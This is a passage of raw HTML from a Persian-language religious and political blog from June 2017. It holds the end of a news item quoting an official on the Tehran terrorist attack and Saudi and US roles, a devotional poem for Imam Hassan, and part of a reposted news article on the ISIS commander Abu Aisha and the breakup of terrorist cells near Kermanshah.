href="http://rooydad24.com/13588335/%D8%AA%D8%AD%D9%84%DB%8C%D9%84_%D8%AC%D8%A7%D9%85%D8%B9%D9%87_%D8%B4%D9%86%D8%A7%D8%B3%D8%A7%D9%86%D9%87_%D8%A7%D8%B2_%D8%AD%D9%85%D9%84%D8%A7%D8%AA_%D8%A7%D9%86%D8%AA%D8%AD%D8%A7%D8%B1%DB%8C_%D8%AA%D9%87%D8%B1%D8%A7%D9%86_%D8%A8%D8%A7_%D8%A7%D9%86%D8%AA%D8%AE%D8%A7%D8%A8%D8%A7%D8%AA%DB%8C_%DA%A9%D9%87_%D8%AF%D8%A7%D8%B4%D8%AA%DB%8C%D9%85_%D8%A7%D9%82%D8%AF%D8%A7%D9%85%D8%A7%D8%AA_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA%DB%8C_%D8%A8%DB%8C_%D9%86%D8%AA%DB%8C%D8%AC%D9%87_%D8%A7%D8%B3%D8%AA">امنیت کشور</a> تلاش کرده و می کنند. مردم هم آرامش خود را حفظ کنند.</font></span></font></p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"> </font></span></font><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">وی در مورد نقش <a href="http://rooydad24.com/13576141/%D8%AD%D9%85%D9%84%D8%A7%D8%AA_%DA%AF%D8%B3%D8%AA%D8%B1%D8%AF%D9%87_%D8%AC%D9%86%DA%AF%D9%86%D8%AF%D9%87_%D9%87%D8%A7%DB%8C_%D8%B3%D8%B9%D9%88%D8%AF%DB%8C_%D8%A8%D9%87_%D8%B5%D8%B1%D9%88%D8%A7%D8%AD_%D9%85%D8%A3%D8%B1%D8%A8">رژیم سعودی</a> در <a href="http://rooydad24.com/13587708/%D9%86%D9%85%D8%A7%DB%8C%D8%B4%DA%AF%D8%A7%D9%87_%D9%82%D8%B1%D8%A2%D9%86_%D8%AA%D8%A7_%D8%A7%D8%B7%D9%84%D8%A7%D8%B9_%D8%AB%D8%A7%D9%86%D9%88%DB%8C_%D8%AA%D8%B9%D8%B7%DB%8C%D9%84_%D8%A7%D8%B3%D8%AA">حادثه تروریستی</a> دیروز تهران، <a href="http://rooydad24.com/13561546/%DA%A9%D9%86%D8%A7%DB%8C%D9%87_%D8%AC%D9%87%D8%A7%D9%86%DA%AF%DB%8C%D8%B1%DB%8C_%D8%A8%D9%87_%D8%AA%D8%B1%D8%A7%D9%85%D9%BE_%D8%A2%D9%85%D8%B1%DB%8C%DA%A9%D8%A7_%D9%85%D8%AA%D9%87%D9%85_%D8%A7%D8%B5%D9%84%DB%8C_%D8%AA%D9%88%D9%84%DB%8C%D8%AF_%DA%AF%D8%A7%D8%B2%D9%87%D8%A7%DB%8C_%DA%AF%D9%84%D8%AE%D8%A7%D9%86%D9%87_%D8%A7%DB%8C_%D8%A7%D8%B3%D8%AA">خاطر نشان</a> کرد: ما در حمایت عربستان از جریان‌های‌ تروریستی در سطح دنیا نباید تردید داشته باشیم. کاملا اثر انگشت سعودی‌ها در حمایت از تروریست‌ها در <a href="http://rooydad24.com/13586473/%D8%AF%D9%88_%D8%B3%D9%86%D8%A7%D8%B1%DB%8C%D9%88%DB%8C_%D8%AD%D9%85%D9%84%D9%87_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA%DB%8C_%D8%A8%D9%87_%D8%AA%D9%87%D8%B1%D8%A7%D9%86">عراق و سوریه</a> مشهود است. در دنیا این باور وجود دارد که پشت جریان تروریستی و حتی خاستگاه ایدئولوژیک آنها <a href="http://rooydad24.com/13586241/%D8%A7%D8%AE%D9%88%D8%A7%D9%86_%D8%A7%D9%84%D9%85%D8%B3%D9%84%D9%85%DB%8C%D9%86_%D8%AF%D8%B1_%D8%A8%DB%8C%D8%A7%D9%86%DB%8C%D9%87_%D8%A7%DB%8C_%D8%A7%D8%AA%D9%87%D8%A7%D9%85%D8%A7%D8%AA_%D8%B9%D8%B1%D8%A8%D8%B3%D8%AA%D8%A7%D9%86_%D8%B3%D8%B9%D9%88%D8%AF%DB%8C_%D8%B1%D8%A7_%D8%B1%D8%AF_%DA%A9%D8%B1%D8%AF">عربستان سعودی</a> است،‌ اما در این مورد چون نمی‌خواهیم برخورد شعاری و اظهارات غیر مستند داشته باشیم، زود است که بگوییم از سمت <a href="http://rooydad24.com/13565765/%D9%82%D8%B7%D8%B1_%D8%B1%D8%A7%D8%A8%D8%B7_%D8%A7%D9%85%D9%86%DB%8C%D8%AA%DB%8C_%D9%88_%D8%AD%DB%8C%D8%A7%D8%AA%DB%8C_%D8%A8%D8%B1%D8%A7%DB%8C_%D8%A2%D9%85%D8%B1%DB%8C%DA%A9%D8%A7_%D8%AF%D8%B1_%D9%85%D9%86%D8%B7%D9%82%D9%87_%D8%A7%D8%B3%D8%AA">عربستان سعودی</a> بوده است. هنوز نمی‌توانیم قضاوت کنیم زیرا در <a href="http://rooydad24.com/13564241/%D8%AA%D8%A3%D9%8A%D9%8A%D8%AF_%D8%A7%D9%86%D8%AA%D8%AE%D8%A7%D8%A8%D8%A7%D8%AA_%D8%B4%D9%88%D8%B1%D8%A7%D9%87%D8%A7_%D8%AF%D8%B1_8_%D8%AD%D9%88%D8%B2%D9%87_%D8%A7%D8%B3%D8%AA%D8%A7%D9%86_%D8%AA%D9%87%D8%B1%D8%A7%D9%86_%D8%AA%D8%A7_%D9%BE%D8%A7%D9%8A%D8%A7%D9%86_%D9%87%D9%81%D8%AA%D9%87_%D8%A8%D8%B1%D8%B1%D8%B3%D9%8A_%D8%A7%D9%86%D8%AA%D8%AE%D8%A7%D8%A8%D8%A7%D8%AA_%D8%AF%D8%B1_%D9%BE%D8%B1%D9%86%D8%AF_%D9%88_%DA%A9%D9%87%D8%B1%D9%8A%D8%B2%DA%A9">حال بررسی</a> موضوع هستیم.</font></span></font></p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"> </font></span></font><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">علوی در مورد اظهارات ترامپ که <a href="http://rooydad24.com/13572735/%D8%AF%D8%B1_%D9%85%D8%B3%D8%A7%D8%A8%D9%82%D9%87_%D8%AE%D9%86%D8%AF%D8%A7%D9%86%D9%86%D8%AF%D9%87_%D8%B4%D9%88_%D8%AF%DB%8C%D8%B4%D8%A8_%DA%86%D9%87_%DA%AF%D8%B0%D8%B4%D8%AA_%D8%B9%DA%A9%D8%B3">شب گذشته</a> ایران را <a href="http://rooydad24.com/13579789/%D8%A7%D8%AA%D9%87%D8%A7%D9%85_%D8%B9%D8%B1%D8%A8%D8%B3%D8%AA%D8%A7%D9%86_%D8%A8%D9%87_%D9%82%D8%B7%D8%B1_%D8%A8%D8%A7_%D9%87%D8%AF%D9%81_%D8%AA%D8%A8%D8%B1%D8%A6%D9%87_%D8%AE%D9%88%D8%AF_%D8%A8%D9%87_%D8%B9%D9%86%D9%88%D8%A7%D9%86_%D8%AD%D8%A7%D9%85%DB%8C_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D9%85_%D8%A7%D8%B3%D8%AA">حامی تروریسم</a> نامیده بود، افزود: <a href="http://rooydad24.com/13589116/%D9%85%D8%A7%D9%85%D9%88%D8%B3%D8%AA%D8%A7_%D8%B4%DB%8C%D8%AE%DB%8C_%D9%85%D8%AA%D9%87%D9%85_%D8%A7%D8%B5%D9%84%DB%8C_%D8%AD%D9%88%D8%A7%D8%AF%D8%AB_%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA%DB%8C_%D8%AF%D9%86%DB%8C%D8%A7_%D9%86%D8%B8%D8%A7%D9%85_%D8%A7%D8%B3%D8%AA%DA%A9%D8%A8%D8%A7%D8%B1_%D8%AC%D9%87%D8%A7%D9%86%DB%8C_%D8%A7%D8%B3%D8%AA">استکبار جهانی</a> اولین بار نیست که از این عناوین <a href="http://rooydad24.com/13581907/%D8%B9%D8%B1%D8%A8%D8%B3%D8%AA%D8%A7%D9%86_%D8%AE%D8%A7%D9%86%D9%87_%D8%B4%DB%8C%D8%B4%D9%87_%D8%A7%DB%8C_%D8%AE%D9%88%D8%AF_%D8%B1%D8%A7_%D8%AF%D8%B1_%D9%85%D8%B9%D8%B1%D8%B6_%D9%88%DB%8C%D8%B1%D8%A7%D9%86%DB%8C_%D9%82%D8%B1%D8%A7%D8%B1_%D9%86%D8%AF%D9%87%D8%AF">استفاده ابزاری</a> می‌کند. حق زندگی برای انسان برای آنها حرمت ندارد که تروریست‌ها را محکوم کنند. مفاهیمی مثل حقوق بشر، مبارزه با تروریسم،‌کشتار جمعی و حقوق انسان‌ها از نظر آمریکا جنبه ابزاری دارد. هرگاه منافع آنها اقتضاء کند از این شعارها استفاده می‌کنند اما زمانی که <a href="http://rooydad24.com/13577737/%D8%A2%D8%B2%D8%A7%D8%AF%D8%B3%D8%A7%D8%B2%DB%8C_%D8%B3%D9%88%D8%B1%DB%8C%D9%87_%D8%A8%D8%A7%DB%8C%D8%AF_%D8%AF%D8%B1_%DA%86%D8%A7%D8%B1%DA%86%D9%88%D8%A8_%D8%AD%D9%82_%D8%AD%D8%A7%DA%A9%D9%85%DB%8C%D8%AA_%D9%85%D9%84%DB%8C_%D8%A7%DB%8C%D9%86_%DA%A9%D8%B4%D9%88%D8%B1_%D8%B5%D9%88%D8%B1%D8%AA_%DA%AF%DB%8C%D8%B1%D8%AF">امنیت ملی</a> آنها اقتضا کند این موارد را به راحتی زیر پا می‌گذارند. ما با این ادبیات آشنا هستیم و این ادبیات <a href="http://rooydad24.com/13561998/%D8%B3%D9%86%D8%A7%D8%B1%DB%8C%D9%88%DB%8C_%D8%A7%D8%AE%DB%8C%D8%B1_%D8%B9%D8%B1%D8%A8%D8%B3%D8%AA%D8%A7%D9%86_%D8%A7%D9%82%D8%AF%D8%A7%D9%85%DB%8C_%D8%B3%D9%85%D8%A8%D9%84%DB%8C%DA%A9_%D8%A8%D8%B1%D8%A7%DB%8C_%D8%A7%D9%86%D8%AD%D8%B1%D8%A7%D9%81_%D8%A7%D9%81%DA%A9%D8%A7%D8%B1_%D8%B9%D9%85%D9%88%D9%85%DB%8C_%D8%AC%D8%B1%DB%8C%D8%A7%D9%86_%D8%A7%D8%B3%D8%AA%D9%82%D9%84%D8%A7%D9%84_%D8%B7%D9%84%D8%A8%DB%8C_%DA%A9%D8%B4%D9%88%D8%B1%D9%87%D8%A7%DB%8C_%D8%AD%D9%88%D8%B2%D9%87_%D8%AE%D9%84%DB%8C%D8%AC_%D9%81%D8%A7%D8%B1%D8%B3_%D8%A2%D8%BA%D8%A7%D8%B2_%D8%B4%D8%AF%D9%87">افکار عمومی</a> دنیا را به تمسخر گویندگان این اظهارات وا می دارد.</font></span></font></p><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak"> </font></span></font><p align="justify"><font size="5" color="#000099"><span style="background-color: rgb(204, 255, 255);"><font face="Mihan-Koodak">وی در پایان با اظهار همدردی با مجروحان این حادثه گفت: عیادت از این مجروحان وظیفه انسانی ماست و ما با مردم همدرد هستیم و دوست نداریم مردم را در تخت بیمارستان ببینیم. دوست داریم مردم را با شادابی و نشاط و سلامتی کاملی ببینیم، اما وقتی این اتفاقات می‌افتد وظیفه داریم با مردم همدردی کرده و از حالا آنها جویا شویم.</font></span></font></p><br> <font style="font-size:8pt;"> <br> <font size="3">برچسب ها: <a href="/post/tag/حادثه تروریستی 17 خرداد تهران">حادثه تروریستی 17 خرداد تهران</a></font><font size="3">، </font><font size="3"><a href="/post/tag/خنثی کردن 100 طرح تروریستی در ایران">خنثی کردن 100 طرح تروریستی در ایران</a></font><font size="3">، </font><font size="3"><a href="/post/tag/ترامپ حامی تروریسم">ترامپ حامی تروریسم</a></font><font size="3">،</font><br><br><br></font> </div> text/html 2017-06-09T15:51:47+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی دشمن ات را تو به بخشندگی ات بخشیدی http://1001SHAYADOBAYAD.mihanblog.com/post/3511 <div class="xpost2"> <div dir="RTL" style="line-height: 200%; margin: 0" align="right"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div style="text-align: right" dir="rtl"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <strong> <div class="xpost2"> <div class="xpost2" style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> &nbsp;</p> <p dir="rtl" style="line-height: 36px; margin-top: 0px; margin-bottom: 0px" align="justify"> <span style="color: #FFFFFF; font-family: Microsoft Sans Serif; font-size: large; font-weight: 700; background-color: #00B700"> &nbsp; بسم الله الرحمن الرحیم &nbsp;</span></p></div> </div> </strong></b> </div> </div> </div> </div> </div> </b> </div> <strong> <b style="color: rgb(68, 68, 68); font-family: Arial; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </strong><div dir="RTL" style="line-height: 200%; margin: 0" align="right"><strong> <b> </b></strong><div dir="RTL" style="line-height: 200%; margin: 0" align="justify"><strong><b> <b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img class="irc_mi" src="http://www.ayehayeentezar.com/gallery/images/74401237296143206095.gif" alt="تصویر مرتبط" style="margin-top: 65px;" height="375" border="0" width="500"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img class="irc_mi" src="http://roshangari.ir/files/videos/thumb/397/1393/04//2226422113024.jpg" alt="تصویر مرتبط" style="margin-top: 89px;" height="311" border="0" width="500"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img class="irc_mi" src="http://www.quranct.com/gallery/images/3/1_1705520224322771652371018537226812198146.jpg" alt="نتیجه تصویری برای میلاد امام حسن مجتبی" style="margin-top: 65px;" height="375" border="0" width="500"></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <img src="http://myatena.persiangig.com/Rezaa%20(1).jpg" alt="http://myatena.persiangig.com/Rezaa%20%281%29.jpg" height="374" border="0" width="500"></p> </font></b><p style="line-height: 60px; margin-top: 0; margin-bottom: 0"><b style="font-size: 12px; font-style: normal; font-variant: normal ; letter-spacing: normal; line-height: normal; orphans: auto; text-align :justify; text-indent: 0px; text-transform: none; white-space: normal ; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF"><font size="5" face="Microsoft Sans Serif" color="#0033CC"> <font size="5"> <br> </font> </font></b> <span style="letter-spacing: -1pt; vertical-align: bottom"> <font size="5" face="Microsoft Sans Serif" color="#0033CC"><b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #E3FFFF">&nbsp;همه را با کرم ات مست گدایی کردی / عبد بودی وُ خدا خواست خدایی کردی&nbsp; <br> &nbsp;لطف تو آمد وُ دلهای ولایی را برد / کرمَت آبروی حاتم طایی را برد&nbsp; <br> &nbsp;آنقدر جود نمودی که دلم بی تاب است / هر کجا اسم شما هست گدایی باب است&nbsp; <br> &nbsp;دو سه باری همه زندگی ات بخشیدی / دشمن ات را تو به بخشندگی ات بخشیدی&nbsp; <br> &nbsp;تو در اوجی وُ به پایین نظرها داری / تو عزیزی وُ به مسکین نظرها داری&nbsp; <br> &nbsp;به همه از کرم وُ لطف شما خیر رسید / کرمَت&nbsp; هم به محبان تو، هم غیر رسید&nbsp; <br> &nbsp;سفره انداختی وُ اینهمه مهمان داری / تو خودت معجره ای ، آیه قرآن داری&nbsp; <br> &nbsp;یک جهان عبد وُ گداهای پریشان داری / فکر کردم نکند ملک سلیمان داری!&nbsp; <br> &nbsp;مثل موسایی وُ اعجاز عصایت جاری است / نه نگفتی به کسی ، دست عطایت جاری است&nbsp; </b></font></span></p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> &nbsp;</p> <p style="line-height: 60px; margin-top: 0; margin-bottom: 0"> <span style="letter-spacing: -1pt; vertical-align: bottom"> <font size="5" face="Arial" color="#00B700"> <b style="font-style: normal; font-variant: 56px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: #FFFFCC">&nbsp; «مهدی صفی یاری » </b></font></span></p> <div style="text-align: justyfy" dir="rtl"> <div style="text-align: right" dir="rtl"> <font size="5" face="Latha"> <span style="text-decoration: overline; background-color: #FFFFCC"> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-style: normal; font-variant: normal; line-height: 56px; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <p style="line-height: 200%; margin-top: 0; margin-bottom: 0" dir="rtl" align="right"> <font color="#520088"> <span style="font-weight: 700; background-color: #F2F2F2"> <font face="Arial" color="#0000FF">&nbsp;</font></span></font><span style="font-weight: 700; background-color: #F2F2F2"><font color="#0000FF"> </font><font face="Arial" color="#0000FF">تهیه وَ تدوین: عـبـــد عـا صـی </font> </span></p> </b> </span></font> <b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> <blockquote> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <b> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> <div class="xpost2" style="color: rgb(68, 68, 68); padding-left: 23px; padding-right: 25px; padding-top: 0px; padding-bottom: 8px; background-color: rgb(242, 255, 255)"> &nbsp;</div> </div> </div> </div> </b> </div> </div> </blockquote> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b></div><b style="color: rgb(68, 68, 68); font-family: Tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: 3px; line-height: normal; orphans: auto; text-align: right; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(183, 152, 105)"> </b> </b> </strong> </div></div></div> text/html 2017-06-08T20:59:28+01:00 1001SHAYADOBAYAD.mihanblog.com عـبـــد عـا صـی «ابوعایشه»، فرمانده به هلاکت رسیده «5 تروریست حادثه تهران» کیست؟ http://1001SHAYADOBAYAD.mihanblog.com/post/3510 <div class="xpost2"><div style="float:right"></div> <div id="InPost_MihanblogShopAds" style="display:block;height:0px;width:100%;border:0px"></div><br><br><div class="title col-xs-36" style="padding:0px 7px;margin-bottom: 10px;"> <h1 style="padding: 0px;margin: 0px" class="title col-xs-36"> <a href="http://www.entekhab.ir/fa/news/348625/%D8%A7%D8%A8%D9%88%D8%B9%D8%A7%DB%8C%D8%B4%D9%87-%D9%81%D8%B1%D9%85%D8%A7%D9%86%D8%AF%D9%87-%D8%A8%D9%87-%D9%87%D9%84%D8%A7%DA%A9%D8%AA-%D8%B1%D8%B3%DB%8C%D8%AF%D9%87-5-%D8%AA%D8%B1%D9%88%D8%B1%DB%8C%D8%B3%D8%AA-%D8%AD%D8%A7%D8%AF%D8%AB%D9%87-%D8%AA%D9%87%D8%B1%D8%A7%D9%86-%DA%A9%DB%8C%D8%B3%D8%AA-%D8%A7%DB%8C%D9%86-%D8%B4%D8%A7%D9%87%E2%80%8C%D9%85%D9%87%D8%B1%D9%87%E2%80%8C-%D8%AF%D8%A7%D8%B9%D8%B4%DB%8C-%D8%AA%D9%88%D8%B3%D8%B7-%D8%AA%DA%A9%E2%80%8C%D8%AA%DB%8C%D8%B1%D8%A7%D9%86%D8%AF%D8%A7%D8%B2-%D8%A7%DB%8C%D8%B1%D8%A7%D9%86%DB%8C-%D8%B4%DA%A9%D8%A7%D8%B1-%D8%B4%D8%AF-%D8%A7%D8%B7%D9%84%D8%A7%D8%B9%D8%A7%D8%AA-%D9%85%D9%86%D8%AA%D8%B4%D8%B1%D9%86%D8%B4%D8%AF%D9%87"> <span style="background-color: rgb(204, 204, 255);">«ابوعایشه»، فرمانده به هلاکت رسیده «5 تروریست حادثه تهران» کیست؟ / این شاه‌مهره‌ داعشی توسط تک‌تیرانداز ایرانی شکار شد + اطلاعات منتشرنشده </span> </a> </h1> </div> <div class="subtitle col-xs-36" align="justify"><span style="background-color: rgb(204, 255, 255);"><font size="4">اواخر مرداد ماه سال جاری یک عملیات مهم اطلاعاتی ــ عملیاتی توسط نیروهای امنیتی ــ نظامی ایران در غرب کشور انجام و در جریان آن، یکی از خطرناکترین تیم‌های تروریستی منهدم می‌شود. گروهی که طبق گزارش وزارت اطلاعات تحت فرماندهی ابوعایشه بوده و 5 تروریست حادثه روز گذشته تهران نیز در آن مشارکت داشته اند.</font></span></div><div align="justify"><span style="background-color: rgb(204, 255, 255);"><font size="4"> <a class="entekhab_lead2" href="http://www.entekhab.ir/">پایگاه خبری تحلیلی انتخاب (Entekhab.ir) : </a></font></span></div> <div style="text-align: justify;"><br></div><div style="text-align: justify;"><img src="http://www.entekhab.ir/files/fa/news/1396/3/18/265639_858.jpg" title="«ابوعایشه»، فرمانده به هلاکت رسیده «5 تروریست حادثه تهران» کیست؟ / این شاه‌مهره‌ داعشی توسط تک‌تیرانداز ایرانی شکار شد + اطلاعات منتشرنشده" alt="«ابوعایشه»، فرمانده به هلاکت رسیده «5 تروریست حادثه تهران» کیست؟ / این شاه‌مهره‌ داعشی توسط تک‌تیرانداز ایرانی شکار شد + اطلاعات منتشرنشده" style="border: none;" class="img-responsive-news" height="558" width="800"></div><div style="text-align: justify;"><br></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">&nbsp;اواخر مرداد ماه سال جاری یک عملیات مهم اطلاعاتی ــ عملیاتی توسط نیروهای امنیتی ــ نظامی ایران در غرب کشور &nbsp;انجام و در جریان آن، یکی از خطرناکترین تیم‌های تروریستی منهدم می‌شود. گروهی که <a href="http://www.entekhab.ir/fa/news/348624">طبق گزارش وزارت اطلاعات</a>&nbsp;، تحت فرماندهی ابوعایشه بوده و 5 تروریست حادثه روز گذشته تهران نیز در آن مشارکت داشته اند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">به گزارش «انتخاب»؛ ماجرا از این قرار بود که دو تیم تروریستی با هدفی مشخص و با عبور از مرزهای عراق از طریق کرمانشاه وارد کشور می‌شوند و خود را به نقطه‌ای در داخل مرزهای ایران در استان کرمانشاه می‌رسانند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">این دو تیم، یک هدف بزرگ و مهم را دنبال می‌کردند که در صورت تحقق این هدف، اهداف بعدی که کار عملیاتی و تروریستی بود، با امکان بیشتری انجام می‌شد.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">هدف اصلی این دو تیم، رساندن فرمانده جدید خود به داخل خاک ایران و استقرار دادن وی در نقطه‌ای امن بود، کسی که به‌احتمال بسیار زیاد "ابوعایشه" یکی از معاونین عملیات گروهک تروریستی داعش، نام داشت.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">ابوعایشه یکی از فرماندهان اصلی و بنا بر برخی اطلاعات، معاون عملیات گروهک تکفیری ــ تروریستی داعش بوده که پس از ناکامی تیم‌های تروریستی اعزامی به ایران مخصوصاً تیم‌هایی که وزارت اطلاعات ایران در تیر ماه خبر انهدام آنها را منتشر کرد، داعش تصمیم می‌گیرد که او را به ایران اعزام کند تا در سطح بالاتری انجام عملیات تروریستی در کشورمان را پیگیری کند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">در جریان آن عملیات بزرگ وزارت اطلاعات، چند تیم تروریستی با مقدار قابل توجهی تجهیزات ساخت بمب کشف شد که این تیم‌ها قصد داشتند در 50 نقطه از تهران، عملیات بمب‌گذاری و انتحاری انجام دهند.&nbsp;</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">با ناکامی طرح‌های عملیاتی پیشین تکفیری‌ها در ایران، داعش تصمیم گرفته‌ بود که کاری بزرگ انجام داده و قبل از هر چیز سازوکار مدیریتی خود را سامان بخشیده و سپس وارد فاز انجام عملیات تروریستی در ایران شود.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><span style="font-weight: bold;">** چندین هفته بعد؛ آغاز عملیات</span></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">چند ماه بعد، فاز اول عملیات برای وارد شدن فرمانده جدید تکفیری‌ها در ایران آغاز شده و وی به‌همراه 2 تیم تروریستی به‌صورت جداگانه از طریق‌ مرزهای غربی، وارد کشور می‌شود و ظاهراً همه چیز به‌خوبی برای این دو تیم پیش می‌رود.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">اما در جریان فرآیند ورود یکی از تیم‌های تروریستی که ابوعایشه در آن تیم حضور نداشته، نیروهای قرارگاه نجف سپاه کرمانشاه با آن تیم درگیر شده و تمام اعضای تیم را در نقطه صفر مرزی به هلاکت می‌رساند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4">اما در سوی دیگر، ابوعایشه به‌همراه یک تیم دیگر و از نقطه‌ای دیگر وارد کشور شده و بدون هیچ مشکلی در یک شهر مرزی در استان کرمانشاه، استقرار اولیه پیدا کرده و مخفی می‌شوند.</font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 255, 255);"><font size="4"><br></font></span></div><div style="text-align: justify;"><span style="background-color: rgb(204, 